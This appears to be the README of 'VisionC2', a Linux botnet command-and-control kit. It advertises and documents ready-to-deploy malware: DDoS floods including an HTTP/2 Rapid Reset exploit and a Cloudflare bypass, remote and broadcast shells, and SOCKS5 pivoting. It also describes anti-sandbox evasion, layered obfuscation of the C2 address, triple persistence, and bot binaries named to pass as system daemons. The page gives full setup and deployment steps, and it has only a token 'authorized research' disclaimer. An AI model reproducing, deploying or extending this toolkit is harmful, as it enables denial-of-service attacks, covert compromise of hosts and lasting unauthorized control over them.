14-arch cross-compiled agents. DDoS, RCE, SOCKS5. TLS 1.3 transport. Anti-analysis. Anti-sandbox. Anti-debugger. Full daemon persistence. Zero plaintext in the binary. Driven through a real-time Go TUI
- Automated Setup Python script handles everything, don't even touch the code. Just run and deploy.
- TLS Communciation Full encrypted bot->c2 session. Blends directly with HTTP/S over port 443.
- Real anti-analysis. 40+ VM/sandbox/debugger signatures. Parent process debugger detection. Sandboxes never even reach the main loop.
- Zero plaintext in the binary. Every sensitive string is AES-128-CTR encrypted at build time and decrypted only at runtime. The encryption key itself is split across 16 individual XOR byte functions scattered throughout the codebase.
- 6-layer C2 address obfuscation. The server address passes through AES-128-CTR, then a 5-layer decode pipeline: Base64 > XOR rotating key > RC4 stream cipher > byte substitution > MD5 checksum verification. A massive improvment over traditional XOR/ChaCha string hiding.
- HMAC challenge-response registration. Bots authenticate via MD5-based challenge-response with per-campaign sync tokens. Prevents replay attacks.
- Triple-redundant Persistence. Systemd service + cron watchdog + rc.local entry. Kill one, the others bring it back.
- Full SOCKS5 Proxy. Complete pivoting with RFC 1929 authentication. Runtime credential updates pushed directly through the TUI — no redeployment needed.
- Remote Shell. Command execution with full output capture. Built-in Linux shortcuts and post-exploit helpers for quick pivoting once you're in.
- Daemonized Stealth. Fork+setsid with disguised process names. Single-instance PID lock prevents duplicate agents from running on the same host.
- Layer 7 Attacks Cloudflare Bypass, Http/2 Rapid Reset Exploit, TLS Bypass, support for proxy list. Good luck finding it else where.
Layer 4 -- Network/Transport
| Method | Description |
|---|---|
| UDP Flood | High-volume 1024-byte payload spam |
| TCP Flood | Connection table exhaustion |
| SYN Flood | SYN packets with randomized source ports (raw TCP) |
| ACK Flood | ACK packet flooding (raw TCP) |
| GRE Flood | GRE protocol (47) packets with max payload |
| DNS Flood | Randomized DNS query types (DNS reflection, max PPS+) |
Layer 7 -- Application
| Method | Description |
|---|---|
| HTTP Flood | GET/POST with randomized headers + user-agents |
| HTTPS/TLS Flood | TLS handshake exhaustion + burst requests |
| CF Bypass | Cloudflare bypass via session/cookie reuse + fingerprinting |
| Rapid Reset | HTTP/2 exploit (CVE-2023-44487) with batched HEADERS + RST_STREAM |
| Proxy Support | Full proxy integration for all L7 methods (HTTP + SOCKS5) |
sudo apt update && sudo apt install -y upx-ucl openssl git wget gcc python3 screen netcat
# Go 1.23+
wget https://go.dev/dl/go1.23.0.linux-amd64.tar.gz
sudo rm -rf /usr/local/go && sudo tar -C /usr/local -xzf go1.23.0.linux-amd64.tar.gz
echo 'export PATH=$PATH:/usr/local/go/bin' >> ~/.bashrc && source ~/.bashrc| Requirement | Minimum | Recommended |
|---|---|---|
| RAM / Storage | 512MB / 1GB | 2GB+ / 5GB+ |
| OS | Linux (any) | Ubuntu 22.04+ / Debian 12+ |
| Network | Port 443 open | + Admin port for split mode |
git clone https://github.com/Syn2Much/VisionC2.git && cd VisionC2
python3 setup.py # Select [1] Full SetupThe wizard prompts for C2 address, admin port (default: 420), and TLS cert details. Output:
bins/ -> 14 bot binaries (multi-arch)
cnc/certificates/ -> server.crt + server.key
server -> CNC binary
setup_config.txt -> Config summary
To change C2 address later: python3 setup.py -> option [2]. Redeploy bots afterward.
./server # TUI mode (default, recommended)
./server --split # Telnet mode on admin port (default: 420)Background: screen -S vision ./server (detach: Ctrl+A, D)
Split mode connect: nc YOUR_IP 420 -> type spamtec -> login.
| Key | Action |
|---|---|
Up/Down or k/j |
Navigate |
Enter |
Select |
q / Esc |
Back / Cancel |
r |
Refresh |
- Bot List -- Live bot status.
Enter=shell,b=broadcast shell,l=attack,i=info,p=persist,r=reinstall,k=kill - Remote Shell -- Interactive shell to one bot.
Ctrl+F=clear,Ctrl+P=persist,Ctrl+R=reinstall - Broadcast Shell -- Command all bots.
Ctrl+A=filter arch,Ctrl+G=filter RAM,Ctrl+B=limit bots - Launch Attack -- Select method, target, port, duration ->
lto launch - Ongoing Attacks -- Progress bars + time remaining.
s=stop all - Socks Manager --
s=start socks (set port + optional user:pass via tab),x=stop. Update creds:!socksauth <user> <pass> - Connection Logs -- Bot connect/disconnect history
| Binary | Architecture | Use Case |
|---|---|---|
| ethd0 | x86_64 (amd64) | Servers, desktops |
| kworkerd0 | x86 (386) | 32-bit systems |
| ip6addrd | ARM64 | Raspberry Pi 4, phones |
| mdsync1 | ARMv7 | Raspberry Pi 2/3 |
| deferwqd | MIPS | Routers |
| devfreqd0 | MIPSLE | Routers (little-endian) |
| ...and 8 more | Various | IoT, embedded |
Build.sh| Full binary map reference
-
cnc/-- Command & Control server. Dual-listener: TLS on port 443 for bot connections, interactive TUI built with Bubble Tea. RBAC with four permission levels (Basic/Pro/Admin/Owner) inusers.json. -
bot/-- Agent deployed to targets. Connects back over TLS 1.3. Lifecycle: decode runtime config -> daemonize -> singleton lock -> environment detection -> install startup methods -> DNS-resolve server -> connect with reconnect loop.
| File | Purpose |
|---|---|
bot/config.go |
All configuration: raw AES data blobs (rawServiceAddr), config seed, sync token, build tag, runtime-decoded string blobs |
bot/connection.go |
TLS connection, multi-method DNS resolution chain (DoH -> UDP -> A record -> raw) |
bot/attacks.go |
All L4/L7 flood methods |
bot/opsec.go |
AES decryption, key derivation, environment detection |
bot/persist.go |
Startup via systemd, cron, rc.local |
bot/socks.go |
SOCKS5 proxy with RFC 1929 auth |
cnc/ui.go |
Bubble Tea TUI -- all views, keybindings, rendering |
cnc/cmd.go |
Command dispatch and routing to bots |
cnc/connection.go |
Bot connection handling, TLS setup, heartbeat |
cnc/miscellaneous.go |
RBAC, user authentication, utilities |
| Document | Description |
|---|---|
ARCHITECTURE.md |
Full system architecture |
CHANGELOG.md |
Version history and changes |
COMMANDS.md |
Command reference |
SETUP.md |
Setup guide |
FOR AUTHORIZED SECURITY RESEARCH AND EDUCATIONAL PURPOSES ONLY
Usage of this tool for attacking targets without prior mutual consent is illegal. The developer assumes no liability and is not responsible for any misuse or damage caused by this program.
Syn2Much -- dev@sinnners.city | @synacket